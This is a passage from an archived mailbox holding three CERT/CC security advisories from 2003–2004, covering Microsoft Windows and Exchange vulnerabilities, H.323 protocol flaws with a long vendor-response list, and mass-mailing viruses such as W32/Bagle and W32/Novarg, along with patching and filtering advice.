F71rr7dhNElR1o2sP6TP3fyGzVYAn2NYpp94oK/VX92dAHOG7QRlhdSD =+mNV -----END PGP PUBLIC KEY BLOCK----- From - Thu Oct 16 14:18:31 2003 X-UIDL: 7251 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from uclink-r.berkeley.edu (rend.Berkeley.EDU [128.32.25.164]) by uclink-store.berkeley.edu (8.12.9-20030924/8.12.3) with ESMTP id h9GLDWOh161340; Thu, 16 Oct 2003 14:13:32 -0700 (PDT) Received: from uclink-r.berkeley.edu (localhost.localdomain [127.0.0.1]) by uclink-r.berkeley.edu (8.12.10/8.12.9) with ESMTP id h9GLDPW1000570; Thu, 16 Oct 2003 14:13:25 -0700 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink-r.berkeley.edu (8.12.10/8.12.9) with ESMTP id h9GLDIWp032767; Thu, 16 Oct 2003 14:13:18 -0700 Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id h9GL514Q022052; Thu, 16 Oct 2003 17:05:16 -0400 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id h9GK233Y017791; Thu, 16 Oct 2003 16:02:03 -0400 Date: Thu, 16 Oct 2003 16:02:03 -0400 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2003-27 Multiple Vulnerabilities in Microsoft Windows and Exchange Precedence: list Status: RO X-Status: X-Keywords: X-UID: 94 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2003-27 Multiple Vulnerabilities in Microsoft Windows and Exchange Original issue date: October 16, 2003 Last revised: -- Source: CERT/CC A complete revision history is at the end of this file. Systems Affected * Multiple versions of Microsoft Windows (ME, NT 4.0, NT 4.0 TSE, 2000, XP, Server 2003) * Microsoft Exchange Server 5.5 and Microsoft Exchange Server 2000 Overview There are multiple vulnerabilities in Microsoft Windows and Microsoft Exchange, the most serious of which could allow remote attackers to execute arbitrary code. I. Description There are a number of vulnerabilities in Microsoft Windows and Microsoft Exchange that could allow an attacker to gain administrative control of a vulnerable system. The most serious of these vulnerabilities allow an unauthenticated, remote attacker to execute arbitrary code with no action required on the part of the victim. For detailed information, see the following vulnerability notes: VU#575892 - Buffer overflow in Microsoft Windows Messenger Service There is a buffer overflow in the Messenger service on most recent versions of Microsoft Windows that could allow an attacker to execute arbitrary code. (Other resources: MS03-043, CAN-2003-0717) VU#422156 - Microsoft Exchange Server fails to properly handle specially crafted SMTP extended verb requests Microsoft Exchange fails to handle certain SMTP extended verbs correctly. In Exchange 5.5, this can lead to a denial-of-service condition. In Exchange 2000, this could permit an attacker to run arbitrary code. (Other resources: MS03-046, CAN-2003-0714) In addition, several other vulnerabilities may permit an attacker to execute arbitrary code if the attacker can convince the victim to take some specific action (e.g., viewing a web page or an HTML email message). For detailed information, see the following vulnerability notes: VU#467036 - Microsoft Windows Help and Support Center contains buffer overflow in code used to handle HCP protocol There is a buffer overflow in the Microsoft Windows Help and Support Center that could permit an attacker to execute arbitrary code with SYSTEM privileges. (Other resources: MS03-044, CAN-2003-0711) VU#989932 - Microsoft Windows contains buffer overflow in Local Troubleshooter ActiveX control (Tshoot.ocx) Microsoft Windows ships with a troubleshooting application to assist users with problems. A vulnerability in this application may permit a remote attacker to execute arbitrary code with the privileges of the current user. (Other resources: MS03-042) VU#838572 - Microsoft Windows Authenticode mechanism installs ActiveX controls without prompting user A vulnerability in Microsoft's Authenticode could allow a remote attacker to install an untrusted ActiveX control on the victim's system. The ActiveX control could run code of the attacker's choice. (Other resources: MS03-041, CAN-2003-0660) VU#435444 - Microsoft Outlook Web Access (OWA) contains cross-site scripting vulnerability in the "Compose New Message" form There is a cross-site scripting vulnerability in Microsoft Outlook Web Access. (Other resources: MS03-047, CAN-2003-0712) Finally, there is a vulnerability in ListBox and ComboBox controls that could allow a local user to gain elevated privileges. For detailed information, see VU#967668 - Microsoft Windows ListBox and ComboBox controls vulnerable to buffer overflow when supplied crafted Windows message There is a buffer overflow in a function called by the Microsoft Windows ListBox and ComboBox controls that could allow a local attacker to execute arbitrary code with privileges of the process hosting the controls. (Other resources: MS03-045, CAN-2003-0659) II. Impact The impact of these vulnerabilities ranges from denial of service to the ability to execute arbitrary code. III. Solution Disable the Messenger Service For VU#575892, Microsoft recommends first disabling the Messenger service and then evaluating the need to apply the patch. If the Messenger service is not required, leave it in the disabled state. Apply the patch to make sure that systems are protected, especially if the Messenger service is re-enabled. Instructions for disabling the Messenger service can be found in VU#575892 and MS03-043. Apply patches Microsoft has provided patches for these problems. Details can be found in the relevant Microsoft Security Bulletins. For many home users, the simplest way to obtain these patches will be by running Windows Update. Appendix A. Vendor Information This appendix contains information provided by vendors. When vendors report new information, this section is updated, and the changes are noted in the revision history. If a vendor is not listed below, we have not received their authenticated, direct statement. Further vendor information is available in the Systems Affected sections of the vulnerability notes listed above. Microsoft Corporation Please see the following Microsoft Security Bulletins: MS03-041, MS03-042, MS03-043, MS03-044, MS03-045, MS03-046, and MS03-047. Appendix B. References * CERT/CC Vulnerability Note VU#575892 - * CERT/CC Vulnerability Note VU#422156 - * CERT/CC Vulnerability Note VU#467036 - * CERT/CC Vulnerability Note VU#989932 - * CERT/CC Vulnerability Note VU#838572 - * CERT/CC Vulnerability Note VU#435444 - * CERT/CC Vulnerability Note VU#967668 - * Microsoft Security Bulletin MS03-041 - * Microsoft Security Bulletin MS03-041 - * Microsoft Security Bulletin MS03-041 - * Microsoft Security Bulletin MS03-041 - * Microsoft Security Bulletin MS03-041 - * Microsoft Security Bulletin MS03-041 - * Microsoft Security Bulletin MS03-041 - _________________________________________________________________ Our thanks to Microsoft Corporation for the information contained in their security bulletins. Microsoft has credited the following people for their help in discovering and responding to these issues: Greg Jones of KPMG UK and Cesar Cerrudo, The Last Stage of Delirium Research Group, David Litchfield of Next Generation Security Software Ltd., Brett Moore of Security-Assessment.com, Joao Gouveia, and Ory Segal of Sanctum Inc. _________________________________________________________________ Feedback can be directed to the authors, Shawn V. Hernan and Art Manion. ______________________________________________________________________ This document is available from: ______________________________________________________________________ CERT/CC Contact Information Email: Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site To subscribe to the CERT mailing list for advisories and bulletins, send email to . Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2003 Carnegie Mellon University. Revision History October 16, 2003: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBP474hpZ2NNT/dVAVAQHpowP/XT60oVtiTpggPZC3c7zmqQNOLeC2ah1L c7gcNSmwa8Ij25D53ephFaMP0PyPDM9w8WX7uDfCYE2W/yMyBx3jwfMs6C5d2wM1 7zhOwu9b2N75rf/UGDuO/QXMe9KSHkIFVJuS3hS6PsOcP307zuh5ieaWCnrGaHFj 3JwQQsmNUTA= =C7x3 -----END PGP SIGNATURE----- From - Wed Jan 14 10:13:30 2004 X-UIDL: 11303 X-Mozilla-Status: 1001 X-Mozilla-Status2: 00000000 Return-Path: Received: from uclink-l.berkeley.edu (lurk.Berkeley.EDU [128.32.25.163]) by uclink-store.berkeley.edu (8.12.9-20030924/8.12.3) with ESMTP id i0EGwp81049299; Wed, 14 Jan 2004 08:58:51 -0800 (PST) Received: from uclink-l.berkeley.edu (localhost.localdomain [127.0.0.1]) by uclink-l.berkeley.edu (8.12.10/8.12.9) with ESMTP id i0EGwh2f004872; Wed, 14 Jan 2004 08:58:43 -0800 Received: from canaveral.indigo.cert.org (canaveral.indigo.cert.org [192.88.209.169]) by uclink-l.berkeley.edu (8.12.10/8.12.9) with ESMTP id i0EGwaJB004729; Wed, 14 Jan 2004 08:58:37 -0800 Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id i0EGmMx8030352; Wed, 14 Jan 2004 11:53:32 -0500 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id i0EFihwE026482; Wed, 14 Jan 2004 10:44:43 -0500 Date: Wed, 14 Jan 2004 10:44:43 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2004-01 Multiple H.323 Message Vulnerabilities Precedence: list Status: RO X-Status: X-Keywords: X-UID: 95 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2004-01 Multiple H.323 Message Vulnerabilities Original release date: January 13, 2004 Last revised: -- Source: CERT/CC, NISCC A complete revision history can be found at the end of this file. Systems Affected * Many software and hardware systems that implement the H.323 protocol Examples include + Voice over Internet Protocol (VoIP) devices and software + Video conferencing equipment and software + Session Initiation Protocol (SIP) devices and software + Media Gateway Control Protocol (MGCP) devices and software + Other networking equipment that may process H.323 traffic (e.g., routers and firewalls) Overview A number of vulnerabilities have been discovered in various implementations of the multimedia telephony protocol H.323. Voice over Internet Protocol (VoIP) and video conferencing equipment and software can use these protocols to communicate over a variety of computer networks. I. Description The U.K. National Infrastructure Security Co-ordination Centre (NISCC) has reported multiple vulnerabilities in different vendor implementations of the multimedia telephony protocol H.323. H.323 is an international standard protocol, published by the International Telecommunications Union, used to facilitate communication among telephony and multimedia systems. Examples of such systems include VoIP, video-conferencing equipment, and network devices that manage H.323 traffic. A test suite developed by NISCC and the University of Oulu Security Programming Group (OUSPG) has exposed multiple vulnerabilities in a variety of implementations of the H.323 protocol (specifically its connection setup sub-protocol H.225.0). Information about individual vendor H.323 implementations is available in the Vendor Information section below, and in the Vendor Information section of NISCC Vulnerability Advisory 006489/H323. The U.K. National Infrastructure Security Co-ordination Centre is tracking these vulnerabilities as NISCC/006489/H.323. The CERT/CC is tracking this issue as VU#749342. This reference number corresponds to CVE candidate CAN-2003-0819, as referenced in Microsoft Security Bulletin MS04-001. II. Impact Exploitation of these vulnerabilities may result in the execution of arbitrary code or cause a denial of service, which in some cases may require a system reboot. III. Solution Apply a patch or upgrade Appendix A and the Systems Affected section of Vulnerability Note VU#749342 contain information provided by vendors for this advisory (). However, as vendors report new information to the CERT/CC, we will only update VU#749342. If a particular vendor is not listed, we have not received their comments. Please contact your vendor directly. Filter network traffic Sites are encouraged to apply network packet filters to block access to the H.323 services at network borders. This can minimize the potential of denial-of-service attacks originating from outside the perimeter. The specific services that should be filtered include * 1720/TCP * 1720/UDP If access cannot be filtered at the network perimeter, the CERT/CC recommends limiting access to only those external hosts that require H.323 for normal operation. As a general rule, filtering all types of network traffic that are not required for normal operation is recommended. It is important to note that some firewalls process H.323 packets and may themselves be vulnerable to attack. As noted in some vendor recommendations like Cisco Security Advisory 20040113-h323 and Microsoft Security Bulletin MS04-001, certain sites may actually want to disable application layer inspection of H.323 network packets. Protecting your infrastructure against these vulnerabilities may require careful coordination among application, computer, network, and telephony administrators. You may have to make tradeoffs between security and functionality until vulnerable products can be updated. Appendix A. - Vendor Information This appendix contains information provided by vendors for this advisory. Please see the Systems Affected section of Vulnerability Note VU#749342 and the Vendor Information section of NISCC Vulnerability Advisory 006489/H323 for the latest information regarding the response of the vendor community to this issue. 3Com No statement is currently available from the vendor regarding this vulnerability. Alcatel No statement is currently available from the vendor regarding this vulnerability. Apple Computer Inc. Apple: Not Vulnerable. Mac OS X and Mac OS X Server do not contain the issue described in this note. AT&T No statement is currently available from the vendor regarding this vulnerability. Avaya Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm Borderware No statement is currently available from the vendor regarding this vulnerability. Check Point No statement is currently available from the vendor regarding this vulnerability. BSDI No statement is currently available from the vendor regarding this vulnerability. Cisco Systems Inc. Please see http://www.cisco.com/warp/public/707/cisco-sa-20040113-h323.shtml Clavister No statement is currently available from the vendor regarding this vulnerability. Computer Associates No statement is currently available from the vendor regarding this vulnerability. Cyberguard Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm Debian No statement is currently available from the vendor regarding this vulnerability. D-Link Systems No statement is currently available from the vendor regarding this vulnerability. Conectiva No statement is currently available from the vendor regarding this vulnerability. EMC Corporation No statement is currently available from the vendor regarding this vulnerability. Engarde No statement is currently available from the vendor regarding this vulnerability. eSoft We don't have an H.323 implementation and thus aren't affected by this. Extreme Networks No statement is currently available from the vendor regarding this vulnerability. F5 Networks No statement is currently available from the vendor regarding this vulnerability. Foundry Networks Inc. No statement is currently available from the vendor regarding this vulnerability. FreeBSD No statement is currently available from the vendor regarding this vulnerability. Fujitsu Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm Global Technology Associates No statement is currently available from the vendor regarding this vulnerability. Hitachi Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm Hewlett-Packard Company Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm Ingrian Networks No statement is currently available from the vendor regarding this vulnerability. Intel No statement is currently available from the vendor regarding this vulnerability. Intoto No statement is currently available from the vendor regarding this vulnerability. Juniper Networks No statement is currently available from the vendor regarding this vulnerability. Lachman No statement is currently available from the vendor regarding this vulnerability. Linksys No statement is currently available from the vendor regarding this vulnerability. Lotus Software No statement is currently available from the vendor regarding this vulnerability. Lucent Technologies Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm Microsoft Corporation Please see http://www.microsoft.com/technet/security/bulletin/MS04-001.asp MontaVista Software No statement is currently available from the vendor regarding this vulnerability. MandrakeSoft No statement is currently available from the vendor regarding this vulnerability. Multi-Tech Systems Inc. No statement is currently available from the vendor regarding this vulnerability. NEC Corporation No statement is currently available from the vendor regarding this vulnerability. NetBSD NetBSD does not ship any H.323 implementations as part of the Operating System. There are a number of third-party implementations available in the pkgsrc system. As these products are found to be vulnerable, or updated, the packages will be updated accordingly. The audit-packages mechanism can be used to check for known-vulnerable package versions. Netfilter No statement is currently available from the vendor regarding this vulnerability. NetScreen No statement is currently available from the vendor regarding this vulnerability. Network Appliance No statement is currently available from the vendor regarding this vulnerability. Nokia No statement is currently available from the vendor regarding this vulnerability. Nortel Networks The following Nortel Networks Generally Available products and solutions are potentially affected by the vulnerabilities identified in NISCC Vulnerability Advisory 006489/H323 and CERT VU#749342: Business Communications Manager (BCM) (all versions) is potentially affected; more information is available in Product Advisory Alert No. PAA 2003-0392-Global. Succession 1000 IP Trunk and IP Peer Networking, and 802.11 Wireless IP Gateway are potentially affected; more information is available in Product Advisory Alert No. PAA-2003-0465-Global. For more information please contact North America: 1-800-4NORTEL or 1-800-466-7835 Europe, Middle East and Africa: 00800 8008 9009, or +44 (0) 870 907 9009 Contacts for other regions are available at http://www.nortelnetworks.com/help/contact/global/ Or visit the eService portal at http://www.nortelnetworks.com/cs under Advanced Search. If you are a channel partner, more information can be found under http://www.nortelnetworks.com/pic under Advanced Search. Novell No statement is currently available from the vendor regarding this vulnerability. Objective Systems Inc. Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm OpenBSD No statement is currently available from the vendor regarding this vulnerability. Openwall GNU/*/Linux No statement is currently available from the vendor regarding this vulnerability. RadVision Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm Red Hat Inc. Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm Oracle Corporation No statement is currently available from the vendor regarding this vulnerability. Riverstone Networks No statement is currently available from the vendor regarding this vulnerability. Secure Computing Corporation No statement is currently available from the vendor regarding this vulnerability. SecureWorks No statement is currently available from the vendor regarding this vulnerability. Sequent No statement is currently available from the vendor regarding this vulnerability. Sony Corporation No statement is currently available from the vendor regarding this vulnerability. Stonesoft No statement is currently available from the vendor regarding this vulnerability. Sun Microsystems Inc. Sun SNMP does not provide support for H.323, so we are not vulnerable. And so far we have not found any bundled products that are affected by this vulnerability. We are also actively investigating our unbundled products to see if they are affected. Updates will be provided to this statement as they become available. SuSE Inc. No statement is currently available from the vendor regarding this vulnerability. Symantec Corporation Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm Unisys No statement is currently available from the vendor regarding this vulnerability. TandBerg Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm Tumbleweed Communications Corp. Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm TurboLinux No statement is currently available from the vendor regarding this vulnerability. uniGone Please see the NISCC Vulnerability Advisory 006489/H323 at http://www.uniras.gov.uk/vuls/2004/006489/h323.htm WatchGuard No statement is currently available from the vendor regarding this vulnerability. Wirex No statement is currently available from the vendor regarding this vulnerability. Wind River Systems Inc. No statement is currently available from the vendor regarding this vulnerability. Xerox No statement is currently available from the vendor regarding this vulnerability. ZyXEL No statement is currently available from the vendor regarding this vulnerability. _________________________________________________________________ The CERT Coordination Center thanks the NISCC Vulnerability Management Team and the University of Oulu Security Programming Group (OUSPG) for coordinating the discovery and release of the technical details of this issue. _________________________________________________________________ Feedback may be directed to the authors: Jeffrey S. Havrilla, Mindi J. McDowell, Shawn V. Hernan and Jason A. Rafail ______________________________________________________________________ This document is available from: http://www.cert.org/advisories/CA-2004-01.html ______________________________________________________________________ CERT/CC Contact Information Email: cert@cert.org Phone: +1 412-268-7090 (24-hour hotline) Fax: +1 412-268-6989 Postal address: CERT Coordination Center Software Engineering Institute Carnegie Mellon University Pittsburgh PA 15213-3890 U.S.A. CERT/CC personnel answer the hotline 08:00-17:00 EST(GMT-5) / EDT(GMT-4) Monday through Friday; they are on call for emergencies during other hours, on U.S. holidays, and on weekends. Using encryption We strongly urge you to encrypt sensitive information sent by email. Our public PGP key is available from http://www.cert.org/CERT_PGP.key If you prefer to use DES, please call the CERT hotline for more information. Getting security information CERT publications and other security information are available from our web site http://www.cert.org/ To subscribe to the CERT mailing list for advisories and bulletins, send email to majordomo@cert.org. Please include in the body of your message subscribe cert-advisory * "CERT" and "CERT Coordination Center" are registered in the U.S. Patent and Trademark Office. ______________________________________________________________________ NO WARRANTY Any material furnished by Carnegie Mellon University and the Software Engineering Institute is furnished on an "as is" basis. Carnegie Mellon University makes no warranties of any kind, either expressed or implied as to any matter including, but not limited to, warranty of fitness for a particular purpose or merchantability, exclusivity or results obtained from use of the material. Carnegie Mellon University does not make any warranty of any kind with respect to freedom from patent, trademark, or copyright infringement. ______________________________________________________________________ Conditions for use, disclaimers, and sponsorship information Copyright 2004 Carnegie Mellon University. Revision History January 13, 2004: Initial release -----BEGIN PGP SIGNATURE----- Version: PGP 6.5.8 iQCVAwUBQASK7JZ2NNT/dVAVAQG65wP8C7DyEvZGz0HqXtRqk+PAjjpMqex1hdjT BfkT6oHMhTWIdvUE1mpAwnV7OPL+N+UugCC0bAEXQzBy/YkBBOptt7IZdIeOlInh AP0RO5zqt0GqMIrdW7P14iWBX2lLCQaMUgWNyvK4ZTNE9UzpOgBk2JonfBLjbH77 KeVgAqcfP2M= =p0GQ -----END PGP SIGNATURE----- From - Tue Jan 27 11:18:54 2004 X-UIDL: 569 X-Mozilla-Status: 0001 X-Mozilla-Status2: 00000000 Return-Path: Received: from canaveral.indigo.cert.org ([192.88.209.130] verified) by calmail-cr.berkeley.edu (CommuniGate Pro SMTP 4.1.8) with ESMTP-TLS id 2663307; Tue, 27 Jan 2004 10:40:38 -0800 Received: from canaveral.indigo.cert.org (localhost [127.0.0.1]) by canaveral.indigo.cert.org (8.12.8/8.12.8/1.29) with ESMTP id i0RIIMSS013650; Tue, 27 Jan 2004 13:35:51 -0500 Received: from localhost (lnchuser@localhost) by canaveral.indigo.cert.org (8.12.8/8.12.8/Submit/1.1) with SMTP id i0RHTAR7011006; Tue, 27 Jan 2004 12:29:10 -0500 Date: Tue, 27 Jan 2004 12:29:10 -0500 Message-Id: From: CERT Advisory To: cert-advisory@cert.org Organization: CERT(R) Coordination Center - +1 412-268-7090 List-Help: , List-Subscribe: List-Unsubscribe: List-Post: NO (posting not allowed on this list) List-Owner: List-Archive: Subject: CERT Advisory CA-2004-02 Email-borne Viruses Precedence: list Status: RO X-Status: X-Keywords: X-UID: 96 -----BEGIN PGP SIGNED MESSAGE----- CERT Advisory CA-2004-02 Email-borne Viruses Original release date: January 27, 2004 Last revised: -- Source: CERT/CC A complete revision history can be found at the end of this file. Systems Affected * Any system running Microsoft Windows (all versions from Windows 95 and up) and used for reading email or accessing peer-to-peer file sharing services. Overview In recent weeks there have been several mass-mailing viruses released on the Internet. It is important for users to understand the risks posed by these pieces of malicious code and the steps necessary to protect their systems from virus infection. I. Description Over the past week, we have seen two more mass-mailing viruses, W32/Bagle and W32/Novarg, impact a significant number of home users and sites. The technology used in these viruses is not significantly different from prior mass-mailing viruses such as W32/Sobig and W32/Mimail. Unsolicited email messages containing attachments are sent to unsuspecting recipients. They may contain a return address, a provocative envelope, or something else that encourages its receiver to open it. This technique is called social engineering. Because we are trusting and curious, social engineering is often effective. The widespread impact of these latest viruses, which rely on human intervention to spread, demonstrates the effectiveness of social engineering. It continues to be important to ensure that anti-virus software is used and updated regularly, that attachments are examined on mail servers, and that firewalls filter unneeded ports and protocols. It also remains necessary that users be educated about the dangers of opening attachments, especially executable attachments. CERT Incident Note IN-2004-01 - W32/Novarg http://www.cert.org/incident_notes/IN-2004-01.html CERT Incident Note IN-2003-03 - W32/Sobig.F http://www.cert.org/incident_notes/IN-2003-03.html CERT Incident Note IN-2003-02 - W32/Mimail http://www.cert.org/incident_notes/IN-2003-02.html II. Impact A virus infection can have significant consquences on your computer system. These consequences include, but are not limited to: * Information disclosure - Mass-mailing viruses typically harvest email addresses from the addressbooks or files found on an infected system. Some viruses will also attempt to send files from an infected host to other potential victims or even back to the virus author. These files may contain sensitive information. * Add/Modify/Delete files - Once a system is compromised, a virus could potentially add, modify or delete arbitrary files on the system. These files may contain personal information or be required for the proper operation of the computer system. * Affect system stability - Viruses can consume significant amounts of computer resources causing a system to run slowly or be rendered unusable. * Install a backdoor - Many viruses will install a backdoor on an infected system. This backdoor may be used by a remote attacker to gain access to the system, or view/add/modify/delete files on the system. These backdoors may also be leveraged to download and control additional tools for use in distributed denial-of-service (DDoS) attacks against other sites. * Attack other systems - Systems infected by viruses are frequently used to attack other systems. These attacks frequently involve attempts to exploit vulnerabilities on the remote systems or denial-of-service attacks that utilize a high volume of network traffic. * Send unsolicited bulk email (spam) to other users - There have been numerous reports of spammers leveraging compromised systems to send unsolicited bulk email. Frequently these compromised systems are poorly protected end user computers (e.g., home and small business systems). III. Solution In addition to following the steps outlined in this section, the CERT/CC encourages home users to review the "Home Network Security" and "Home Computer Security" documents. Home Network Security http://www.cert.org/tech_tips/home_networks.html Home Computer Security http://www.cert.org/homeusers/HomeComputerSecurity/ Run and maintain an anti-virus product While an up-to-date antivirus software package cannot protect against all malicious code, for most users it remains the best first l